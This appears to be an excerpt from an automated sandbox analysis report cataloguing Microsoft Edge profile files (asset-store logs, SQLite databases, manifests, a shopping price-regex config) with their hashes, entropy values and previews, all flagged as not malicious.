                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):1696115
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.04061501815607
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24576:kjf76gGkISshcFdmcOAoPENUpifYP+MbI2T:kjfgAmmE
                                                                                                                                                                                                                                                                                                MD5:BEEEAA2C6498E174BEE185E7FF523701
                                                                                                                                                                                                                                                                                                SHA1:540F8290DCA1645162F2AE14195BD76EF8D7573C
                                                                                                                                                                                                                                                                                                SHA-256:B4F67F893EF1CD05F69992F415EF02B192B2071BD57D84CDEF5D5FDEA0F73E75
                                                                                                                                                                                                                                                                                                SHA-512:8027B908E47E980A1946CE2C65E9758FF7B4431D6CBAE7FBBAB3E5742856DDE898E2C3E59F0C5EFC152BD5E33D863D36437DEF386279B7CC439D414C729057DA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1.....................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340965219355520.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):342
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.091927236147782
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp4pMN+q2PcNwi23oH+Tcwt9Eh1tIFUtL4pFFoZmwl4plVkwOcNwi23oH+TcwtY:7p4iIvLZYeb9Eh16FUtL4xo/l4d54ZYf
                                                                                                                                                                                                                                                                                                MD5:71078625F551F53D1061EB259BCC5E70
                                                                                                                                                                                                                                                                                                SHA1:CF10BB9B9D54786CB3A4439801D2ED7C44548527
                                                                                                                                                                                                                                                                                                SHA-256:BAE798B41D3BE7FD60EB120C642F84B0780D6F93A1D0CE0403110727A5A16FAE
                                                                                                                                                                                                                                                                                                SHA-512:BEA29638F2D221345B7F587334523F5DC54718BF10F1D611B2F5B9C6998E0AC1AA243E3CCD290F95C2CD9AF0030D45E709F1E0998A28A6354515A56B37021260
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:10.119 1ca8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/07-07:19:10.120 1ca8 Recovering log #3.2025/01/07-07:19:10.127 1ca8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):342
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.091927236147782
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp4pMN+q2PcNwi23oH+Tcwt9Eh1tIFUtL4pFFoZmwl4plVkwOcNwi23oH+TcwtY:7p4iIvLZYeb9Eh16FUtL4xo/l4d54ZYf
                                                                                                                                                                                                                                                                                                MD5:71078625F551F53D1061EB259BCC5E70
                                                                                                                                                                                                                                                                                                SHA1:CF10BB9B9D54786CB3A4439801D2ED7C44548527
                                                                                                                                                                                                                                                                                                SHA-256:BAE798B41D3BE7FD60EB120C642F84B0780D6F93A1D0CE0403110727A5A16FAE
                                                                                                                                                                                                                                                                                                SHA-512:BEA29638F2D221345B7F587334523F5DC54718BF10F1D611B2F5B9C6998E0AC1AA243E3CCD290F95C2CD9AF0030D45E709F1E0998A28A6354515A56B37021260
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:10.119 1ca8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/07-07:19:10.120 1ca8 Recovering log #3.2025/01/07-07:19:10.127 1ca8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.4630429599263615
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuWl8kt:TouQq3qh7z3bY2LNW9WMcUvBuU
                                                                                                                                                                                                                                                                                                MD5:1BCDA6BF2CA4A8F3B3CA9B21FFA1904F
                                                                                                                                                                                                                                                                                                SHA1:7C72BC21119FA49040D9455A77CB087D2C70A162
                                                                                                                                                                                                                                                                                                SHA-256:F1C4CE1F69C72362E55FE5DD764D0874BBFD3F8ED429196DB598004CAC4F38F2
                                                                                                                                                                                                                                                                                                SHA-512:4412637A6167C9C25EF497FBE3EB1CB10E7A22E8AC36589E28293E70B18B315EC6DDF00FF489119006B4E607ED79AE5CD29BDF2179670721BF2CE76EC37E11B2
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):10240
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                                MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                                SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                                SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                                SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):351
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.190819062410637
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp43ayq2PcNwi23oH+TcwtnG2tMsIFUtL43/7Lj1Zmwl43/7L1RkwOcNwi23oHC:7p43ayvLZYebn9GFUtL43/79/l43/7pI
                                                                                                                                                                                                                                                                                                MD5:27A55425EC618572597238986233B7A4
                                                                                                                                                                                                                                                                                                SHA1:208AEF2EA76F5B1422C314BAC67745A6FF959FE6
                                                                                                                                                                                                                                                                                                SHA-256:56A6F4DBC152CD68A925625AACA6549242E5C2115C1D2AF7428834F616DC3F1C
                                                                                                                                                                                                                                                                                                SHA-512:2120D3CAF7F1861232FCD1380E7F0B1B7F19062A29A4D0B3A5AF7873DC5C90C888401AC0A439BF7A2274670AE9F8DB4FC884AFBB78023B13D8DC362029445EEE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:02.951 a74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/07-07:19:02.952 a74 Recovering log #3.2025/01/07-07:19:02.952 a74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):351
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.190819062410637
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp43ayq2PcNwi23oH+TcwtnG2tMsIFUtL43/7Lj1Zmwl43/7L1RkwOcNwi23oHC:7p43ayvLZYebn9GFUtL43/79/l43/7pI
                                                                                                                                                                                                                                                                                                MD5:27A55425EC618572597238986233B7A4
                                                                                                                                                                                                                                                                                                SHA1:208AEF2EA76F5B1422C314BAC67745A6FF959FE6
                                                                                                                                                                                                                                                                                                SHA-256:56A6F4DBC152CD68A925625AACA6549242E5C2115C1D2AF7428834F616DC3F1C
                                                                                                                                                                                                                                                                                                SHA-512:2120D3CAF7F1861232FCD1380E7F0B1B7F19062A29A4D0B3A5AF7873DC5C90C888401AC0A439BF7A2274670AE9F8DB4FC884AFBB78023B13D8DC362029445EEE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:02.951 a74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/07-07:19:02.952 a74 Recovering log #3.2025/01/07-07:19:02.952 a74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.6127109995648983
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jRUZpcGmL:TO8D4jJ/6Up+lN
                                                                                                                                                                                                                                                                                                MD5:35CD92B43D1EA78D783925776D6C7188
                                                                                                                                                                                                                                                                                                SHA1:4DA8FC562C5919BD7F2471B05891B54F9AE9C2C3
                                                                                                                                                                                                                                                                                                SHA-256:89D115CDF8A402D45D6B7295D03784A418F8FCC9BF6589D9784E1DB02B9D14D7
                                                                                                                                                                                                                                                                                                SHA-512:D445850247F50F19B7751F0E4EFF0EFD537F679DD131AFCA1016D14738B7CDD55E6CB071CFFA9F2EC1815952E1FA2143E9F0730B4029019BFB740C8587DC182D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):375520
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.354162421918691
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6144:WA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:WFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                MD5:3E05DCCCDBB84B39F019D56BC8ED7A35
                                                                                                                                                                                                                                                                                                SHA1:67234501C95C9529CCDE5C3E8F95263E9E64E648
                                                                                                                                                                                                                                                                                                SHA-256:36C602711A4866E96EAC7147A1B190F3E20405F5E18462C06131DBC5148ABBBC
                                                                                                                                                                                                                                                                                                SHA-512:4956C94D5450FCF0C0DFE9015C019A68712AD676738EE15DC962C8A257072D8C4782957DAF03855E89F110847E0A78249094E0120AF15DC84101D9050B576AE0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1....q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13380725951574945..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):317
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.161589943853795
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp4vvAAEq1cNwi23oH+Tcwtk2WwnvB2KLl74tTM9+q2PcNwi23oH+Tcwtk2Wwnp:7p4v2cZYebkxwnvFLl4ZvLZYebkxwnQg
                                                                                                                                                                                                                                                                                                MD5:2F5D855AD3D8AD3D5E66D18909A5CBE0
                                                                                                                                                                                                                                                                                                SHA1:A9BC7374191DC74517C2E644C8E4A1AD6DC3113E
                                                                                                                                                                                                                                                                                                SHA-256:E0591B93DF809CE6EE86ADEA4ACCECA90DF03005DCFF74A1C44ECBC049EDC445
                                                                                                                                                                                                                                                                                                SHA-512:3C24238A293FC1800038F05F4090AAF8DD17947D518CB737DA1F2BD1D2CC2E8D736260942FE44710905907165DCB59B7C762ADAB0E76568A48F3856D81310319
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:10.217 1d88 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2025/01/07-07:19:10.531 1d88 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):358859
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.32460773903042
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6R3:C1gAg1zfvP
                                                                                                                                                                                                                                                                                                MD5:37DEB1E3DC778E444F1CE65E27236E65
                                                                                                                                                                                                                                                                                                SHA1:C05BFC700D95ABF06D6FABF3E9B03AD30B0AF283
                                                                                                                                                                                                                                                                                                SHA-256:3A83012F3F2B260AF39709A1880018E42209819925689195FB16FF9D60E3D621
                                                                                                                                                                                                                                                                                                SHA-512:C52EF2FC8105F9C3E7243BEA3359B281B6EB08AD1DEABED58A3350EA195C6989D0EAB27ED9E7B06FE59A078AD635956C181F5F73413069104FF5CF7E230FB54E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):418
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):327
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.168832279455654
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp43Zvlyq2PcNwi23oH+Tcwt8aPrqIFUtL43Mj1Zmwl43M1RkwOcNwi23oH+TcD:7p43ryvLZYebL3FUtL43MJ/l43M1R546
                                                                                                                                                                                                                                                                                                MD5:40D533A76230622C5FBA804CA38017B3
                                                                                                                                                                                                                                                                                                SHA1:12C3467921B194977ADD3D8192931B29107EA3CA
                                                                                                                                                                                                                                                                                                SHA-256:DCA7F9B48BCF0CE2A4B1FC5965540BB975759639D84170A063C870364F1A3878
                                                                                                                                                                                                                                                                                                SHA-512:5AFF36A72C999E204EECDDDCFC8BE4D4141F385FE67B9171434A68668BB6D6F8B96B72EEEF5F121A25DF64964EA2DA4A39F7567445BEEDE81D23F082B668F439
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:02.954 a74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/01/07-07:19:02.955 a74 Recovering log #3.2025/01/07-07:19:02.955 a74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
